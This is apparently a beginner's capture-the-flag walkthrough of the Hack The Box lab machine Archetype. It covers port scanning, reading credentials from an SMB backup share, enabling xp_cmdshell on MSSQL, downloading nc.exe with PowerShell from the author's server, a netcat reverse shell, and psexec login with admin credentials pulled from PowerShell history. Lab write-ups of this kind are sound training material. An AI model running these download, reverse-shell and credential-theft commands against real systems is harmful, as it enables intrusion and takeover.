[*]
Hack The Box Academy first machine : ArchType, if you are beginning into CTFs, here is little help .
Pre-requisites: Yes it’s a basic machine and we have just started, it would still be better to have idea of
nmap, smb, smbclient , psexec , git-clone, mssqlclient.py(and basic commands) , impacket, basic windows commands, python web-server, netcat.
First we connect and get the IP of machine, scan for open ports only.
We now run aggressive scans on those ports only that were detected in step 1 { 135,139,445,1433,47001,49668} , or you can also start from here with -p- to scan all ports.
┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype] └─$ sudo nmap -sV -sC -A -O -T5 -p135,139,445,47001,49668,1433 10.10.10.27 -oA Archtype -vv [sudo] password for abhinav: Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-15 20:14 IST NSE: Loaded 153 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 20:14 Completed NSE at 20:14, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 20:14 Completed NSE at 20:14, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 20:14 Completed NSE at 20:14, 0.00s elapsed Initiating Ping Scan at 20:14 Scanning 10.10.10.27 [4 ports] Completed Ping Scan at 20:14, 0.04s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 20:14 Completed Parallel DNS resolution of 1 host. at 20:14, 0.33s elapsed Initiating SYN Stealth Scan at 20:14 Scanning 10.10.10.27 [6 ports] Discovered open port 139/tcp on 10.10.10.27 Discovered open port 445/tcp on 10.10.10.27 Discovered open port 135/tcp on 10.10.10.27 Discovered open port 49668/tcp on 10.10.10.27 Discovered open port 1433/tcp on 10.10.10.27 Discovered open port 47001/tcp on 10.10.10.27 Completed SYN Stealth Scan at 20:14, 0.42s elapsed (6 total ports) Initiating Service scan at 20:14 Scanning 6 services on 10.10.10.27 Completed Service scan at 20:16, 62.65s elapsed (6 services on 1 host) Initiating OS detection (try #1) against 10.10.10.27 Initiating Traceroute at 20:16 Completed Traceroute at 20:16, 0.02s elapsed Initiating Parallel DNS resolution of 2 hosts. at 20:16 Completed Parallel DNS resolution of 2 hosts. at 20:16, 0.34s elapsed NSE: Script scanning 10.10.10.27. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 20:16 Completed NSE at 20:16, 22.62s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 20:16 Completed NSE at 20:16, 1.99s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 20:16 Completed NSE at 20:16, 0.00s elapsed Nmap scan report for 10.10.10.27 Host is up, received reset ttl 128 (0.045s latency). Scanned at 2021-06-15 20:14:56 IST for 92s PORT STATE SERVICE REASON VERSION 135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn 445/tcp open microsoft-ds syn-ack ttl 128 Windows Server 2019 Standard 17763 microsoft-ds 1433/tcp open ms-sql-s syn-ack ttl 128 Microsoft SQL Server 2017 14.00.1000.00; RTM | ms-sql-ntlm-info: | Target_Name: ARCHETYPE | NetBIOS_Domain_Name: ARCHETYPE | NetBIOS_Computer_Name: ARCHETYPE | DNS_Domain_Name: Archetype | DNS_Computer_Name: Archetype |_ Product_Version: 10.0.17763 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Issuer: commonName=SSL_Self_Signed_Fallback | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2021-06-15T14:42:50 | Not valid after: 2051-06-15T14:42:50 | MD5: 6121 7eba 5d98 d31d 8323 934b 0cea a2c4 | SHA-1: e43f 3457 4f9d e534 91bb 3017 97a1 8af5 f43b b6e3 | -----BEGIN CERTIFICATE----- | MIIDADCCAeigAwIBAgIQLwZia/44joxNsCS0vYybZDANBgkqhkiG9w0BAQsFADA7 | MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA | bABsAGIAYQBjAGswIBcNMjEwNjE1MTQ0MjUwWhgPMjA1MTA2MTUxNDQyNTBaMDsx | OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs | AGwAYgBhAGMAazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAK4Xpva/ | JMRfp+GRia0FeoMgsbwfmemIzJxSn1TVO3nwBX6TeICwT7K7SAxZyNdRiJYSOcPu | nyQP91EqfpMHyPiiCCqc7ibV7lmn9bXEGbvLo76NAjZyD0eqoSNWQpHI1gVKk+0I | zwjomOHqKzzMhSEIQ6CCINO9aB51bVLMtuJ5y34IJ1odLf3a0RYYmVkD0t/Spu4a | frO+njDWHmcc4zv7U40tGp5sm0rlLqELWpC9AqoUDacQ6ahASMyGu6tc3mD3bLkC | A22aoA31GLihtCTw2U8q/bj0MoTWL8f94sUchoU5xeJGe/zMEYP1WLFivZjzp4Yv | ttk98hNAJSmNlHUCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAbpGUgLzkrFOaXLux | znX+D25t+cZK12nMKCipFvVIr9Qik3fAc9yoqlLTyx01TnbkiwHiMPNIbKS8n+MR | fuafpSLqwGdNHT6M/H2pgTPxuUmXVnXEdNFRB3I6Jf67U3BRh3lNSFapK+EtiEme | aPCJnMZQnZyxAmmLMAOq1k9mGlf+a/zoOmI+x77SE/exvlmy+duLBWhvrrYkmm4o | kFtCHZrkMUxbXdMbi9Md9hsijy6ojE+UUml6c4Jm4O2VRBvyVS+19RpMp1fATBWb | minyiz/WfZE0TQTJFhxmdPq6ku2eMLiBjVfiVqrVgATv/dEf0GqqOUJy7HFhyQpL | uYsPKQ== |_-----END CERTIFICATE----- |_ssl-date: 2021-06-15T15:04:39+00:00; +18m12s from scanner time. 47001/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49668/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Microsoft Windows XP|7|2012 OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012 OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=6/15%OT=135%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=60C8BD44%P=x OS:86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=103%TS=U)OPS(O1=M5B4%O2=M5B4%O3= OS:M5B4%O4=M5B4%O5=M5B4%O6=M5B4)WIN(W1=FAF0%W2=FAF0%W3=FAF0%W4=FAF0%W5=FAF0 OS:%W6=FAF0)ECN(R=Y%DF=N%TG=80%W=FAF0%O=M5B4%CC=N%Q=)T1(R=Y%DF=N%TG=80%S=O% OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=N%TG=80%W=FAF0%S=O%A=S+%F=AS%O=M5B4%R OS:D=0%Q=)T4(R=Y%DF=N%TG=80%W=7FFF%S=A%A=Z%F=R%O=%RD=0%Q=)T6(R=Y%DF=N%TG=80 OS:%W=7FFF%S=A%A=Z%F=R%O=%RD=0%Q=)U1(R=N)IE(R=Y%DFI=N%TG=80%CD=Z) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=258 (Good luck!) IP ID Sequence Generation: Busy server or unknown class Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 1h42m12s, deviation: 3h07m52s, median: 18m11s | ms-sql-info: | 10.10.10.27:1433: | Version: | name: Microsoft SQL Server 2017 RTM | number: 14.00.1000.00 | Product: Microsoft SQL Server 2017 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 53066/tcp): CLEAN (Couldn't connect) | Check 2 (port 49748/tcp): CLEAN (Couldn't connect) | Check 3 (port 45578/udp): CLEAN (Timeout) | Check 4 (port 63282/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked | smb-os-discovery: | OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3) | Computer name: Archetype | NetBIOS computer name: ARCHETYPEx00 | Workgroup: WORKGROUPx00 |_ System time: 2021-06-15T08:04:20-07:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-06-15T15:04:17 |_ start_date: N/A TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 0.46 ms 192.168.252.2 2 0.45 ms 10.10.10.27 NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 20:16 Completed NSE at 20:16, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 20:16 Completed NSE at 20:16, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 20:16 Completed NSE at 20:16, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 91.84 seconds Raw packets sent: 54 (4.316KB) | Rcvd: 39 (2.108KB) ┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype] └─$
As we see SMB shares, lets find out more about them.
──(abhinav㉿ETHICALHACKX)-[~] └─$ smbclient -L \\10.10.10.27\ Enter WORKGROUPabhinav's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin backups Disk C$ Disk Default share IPC$ IPC Remote IPC SMB1 disabled -- no workgroup available
We can check which SMB shares we are able to access, Let get into backup and know more. We check the contents on the file prod.dtsConfig . We can use the get command on smbclient connected to get the file to local machine.
┌──(abhinav㉿ETHICALHACKX)-[~] └─$ smbclient //10.10.10.27/backups 1 ⨯ Enter WORKGROUPabhinav's password: Try "help" to get a list of possible commands. smb: > dir . D 0 Mon Jan 20 17:50:57 2020 .. D 0 Mon Jan 20 17:50:57 2020 prod.dtsConfig AR 609 Mon Jan 20 17:53:02 2020 10328063 blocks of size 4096. 8259190 blocks available smb: > get prod.dtsConfig getting file prod.dtsConfig of size 609 as prod.dtsConfig (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec) smb: > ^C
The contents of the file are as below, we can see username and password for a user
<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPEsql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>From the detailed nmap scan we know port 1433 has sql on it, let try to connect using the username and password we had in the file, very evident from the text we got in backup folder.
I would also suggest to get the git clone of impacket from https://github.com/SecureAuthCorp/impacket . And it would be much better if this is installed properly and run from within the cloned folder.
┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype] └─$ python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py ARCHTYPE/sql_svc@ArchType.HTB -windows-auth 1 ⨯ Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation Password: [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'. [*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (140 3232) [!] Press help for extra shell commands SQL>
We now get netcat , which we host on our machine first using the python server. We can get the nc.exe from the github link at – https://github.com/int0x33/nc.exe/blob/master/nc.exe
┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype] └─$ python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 10.10.10.27 - - [16/Jun/2021 00:40:31] "GET /nc.exe HTTP/1.1" 200 - 10.10.10.27 - - [16/Jun/2021 00:44:44] "GET /nc.exe HTTP/1.1" 200 - 10.10.10.27 - - [16/Jun/2021 00:45:39] "GET /winpeas.bat HTTP/1.1" 200 - 10.10.10.27 - - [16/Jun/2021 00:48:28] "GET /nc.exe HTTP/1.1" 200 - 10.10.10.27 - - [16/Jun/2021 00:50:25] "GET /nc.exe HTTP/1.1" 200 -
SQL> enable_xp_cmdshell [*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install. [*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install. SQL> xp_cmdshell "powershell wget -UseBasicParsing http://10.10.16.59:8000/nc.exe -OutFile %temp%/nc.exe" output -------------------------------------------------------------------------------- NULL
Now we can start netcat listener on any port and execute netcat on the machine too.
┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype] └─$ nc -nlvp 1234 1 ⨯ listening on [any] 1234 ...
and we execute nc from the machine too
SQL> xp_cmdshell "%temp%/nc.exe -nv 10.10.16.59 1234 -e cmd.exe"
We now get back to netcat where we got active connection listening, lets try to grab the user flag and root flag.
┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype] └─$ nc -nlvp 1234 1 ⨯ listening on [any] 1234 ... connect to [10.10.16.59] from (UNKNOWN) [10.10.10.27] 49676 Microsoft Windows [Version 10.0.17763.107] (c) 2018 Microsoft Corporation. All rights reserved. C:Windowssystem32>cd %userprofile% cd %userprofile% C:Userssql_svc>cd desktop cd desktop C:Userssql_svcDesktop>dir dir Volume in drive C has no label. Volume Serial Number is CE13-2325 Directory of C:Userssql_svcDesktop 01/20/2020 06:42 AM <DIR> . 01/20/2020 06:42 AM <DIR> .. 02/25/2020 07:37 AM 32 user.txt 1 File(s) 32 bytes 2 Dir(s) 33,786,163,200 bytes free C:Userssql_svcDesktop> C:Userssql_svcDesktop>type user.txt type user.txt 3e7b102e78218e935bf3f4951fec21a3 C:Userssql_svcDesktop>cd .. cd .. C:Userssql_svc>dir dir Volume in drive C has no label. Volume Serial Number is CE13-2325 Directory of C:Userssql_svc 01/20/2020 06:01 AM <DIR> . 01/20/2020 06:01 AM <DIR> .. 01/20/2020 06:01 AM <DIR> 3D Objects 01/20/2020 06:01 AM <DIR> Contacts 01/20/2020 06:42 AM <DIR> Desktop 01/20/2020 06:01 AM <DIR> Documents 01/20/2020 06:01 AM <DIR> Downloads 01/20/2020 06:01 AM <DIR> Favorites 01/20/2020 06:01 AM <DIR> Links 01/20/2020 06:01 AM <DIR> Music 01/20/2020 06:01 AM <DIR> Pictures 01/20/2020 06:01 AM <DIR> Saved Games 01/20/2020 06:01 AM <DIR> Searches 01/20/2020 06:01 AM <DIR> Videos 0 File(s) 0 bytes 14 Dir(s) 33,834,094,592 bytes free C:Userssql_svc>cd .. cd .. C:Users>dir dir Volume in drive C has no label. Volume Serial Number is CE13-2325 Directory of C:Users 01/19/2020 04:10 PM <DIR> . 01/19/2020 04:10 PM <DIR> .. 01/19/2020 11:39 PM <DIR> Administrator 01/19/2020 11:39 PM <DIR> Public 01/20/2020 06:01 AM <DIR> sql_svc 0 File(s) 0 bytes 5 Dir(s) 33,833,717,760 bytes free C:Users>cd Administrator cd Administrator Access is denied. C:Users>
We got the user flag, but not the root flag yet.
Let us dig more, try to find more from command history, lets see the powershell commands history
C:Userssql_svcAppDataLocalMicrosoftWindowsPowerShell>cd %userprofile%AppDataRoamingMicrosoftWindows PowerShellPSReadline
type %userprofiles%AppDataRoamingMicrosoftWindowsPowerShellPSReadlineConsoleHost_history.txt.
net.exe use T: \Archetypebackups /user: administrator MEGACORP_4dmin!!
exitSo we see an admin username and password is MEGACORP_4dmin!!
Lets now get to psexec which let you execute commands on remote system after login.
Note : if the modules are not properly installed, you might spend your rest day trying to fix the errors.
┌──(abhinav㉿ETHICALHACKX)-[~/htb/Archtype/impacket/examples] └─$ psexec.py Administrator@10.10.10.27 cmd Impacket v0.9.24.dev1+20210611.72516.1a5ed9dc - Copyright 2021 SecureAuth Corporation Password: [*] Requesting shares on 10.10.10.27..... [*] Found writable share ADMIN$ [*] Uploading file GCtlWvSE.exe [*] Opening SVCManager on 10.10.10.27..... [*] Creating service JBxd on 10.10.10.27..... [*] Starting service JBxd..... [!] Press help for extra shell commands
So now we can heck further as now we have the root/admin access.
$ psexec.py Administrator@10.10.10.27 cmd Impacket v0.9.24.dev1+20210611.72516.1a5ed9dc - Copyright 2021 SecureAuth Corporation Password: [*] Requesting shares on 10.10.10.27..... [*] Found writable share ADMIN$ [*] Uploading file GCtlWvSE.exe [*] Opening SVCManager on 10.10.10.27..... [*] Creating service JBxd on 10.10.10.27..... [*] Starting service JBxd..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.107] (c) 2018 Microsoft Corporation. All rights reserved. C:Windowssystem32>whoami nt authoritysystem C:Windowssystem32>cd c:/users/administrator c:UsersAdministrator>cd desktop c:UsersAdministratorDesktop>dir Volume in drive C has no label. Volume Serial Number is CE13-2325 Directory of c:UsersAdministratorDesktop 01/20/2020 06:42 AM <DIR> . 01/20/2020 06:42 AM <DIR> .. 02/25/2020 07:36 AM 32 root.txt 1 File(s) 32 bytes 2 Dir(s) 33,832,914,944 bytes free c:UsersAdministratorDesktop>type root.txt b91ccec3305e98240082d4474b848528 c:UsersAdministratorDesktop>
I would not say the box was very simple to get around since the python modules we used was broken it we would not know how to and what to use for a starting point machine , specially if you are not an experienced CTF player.
About Author
